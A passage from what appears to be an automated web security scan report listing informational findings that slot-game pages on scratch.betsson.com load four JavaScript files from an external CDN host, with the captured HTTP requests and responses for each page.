Path:   /en/Slots/5th-Avenue

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/5th-Avenue HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:27 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:27 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:26 GMT
Connection: close
Content-Length: 102689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.93. https://scratch.betsson.com/en/Slots/Adventure-Jack

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Adventure-Jack

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Adventure-Jack HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:26 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:26 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:26 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.94. https://scratch.betsson.com/en/Slots/Atlantis

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Atlantis

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Atlantis HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:38 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.95. https://scratch.betsson.com/en/Slots/Bon-Apetit

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Bon-Apetit

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Bon-Apetit HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:15 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.96. https://scratch.betsson.com/en/Slots/Cafe-Paris

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Cafe-Paris

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Cafe-Paris HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:56 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:56 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:56 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:56 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:56 GMT
Connection: close
Content-Length: 102690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.97. https://scratch.betsson.com/en/Slots/Castle-Slots

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Castle-Slots

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Castle-Slots HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:29 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:28 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.98. https://scratch.betsson.com/en/Slots/Chic-Boutique

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Chic-Boutique

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Chic-Boutique HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:40 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:40 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:40 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:40 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:39 GMT
Connection: close
Content-Length: 102690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.99. https://scratch.betsson.com/en/Slots/Conga-Beat

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Conga-Beat

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Conga-Beat HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:18 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:18 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:18 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:18 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:17 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.100. https://scratch.betsson.com/en/Slots/Egyptian-Magic

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Egyptian-Magic

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Egyptian-Magic HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:50 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:50 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:50 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:50 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:50 GMT
Connection: close
Content-Length: 102685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.101. https://scratch.betsson.com/en/Slots/Esmeralda

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Esmeralda

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Esmeralda HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:16 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:16 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:16 GMT
Connection: close
Content-Length: 102690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.102. https://scratch.betsson.com/en/Slots/Fair-Play

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Fair-Play

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Fair-Play HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:15 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.103. https://scratch.betsson.com/en/Slots/Fantasia

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Fantasia

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:37 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:37 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:36 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.104. https://scratch.betsson.com/en/Slots/Grand-Crown

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Grand-Crown

Issue detail

The response dynamically includes the following scripts from other domains:

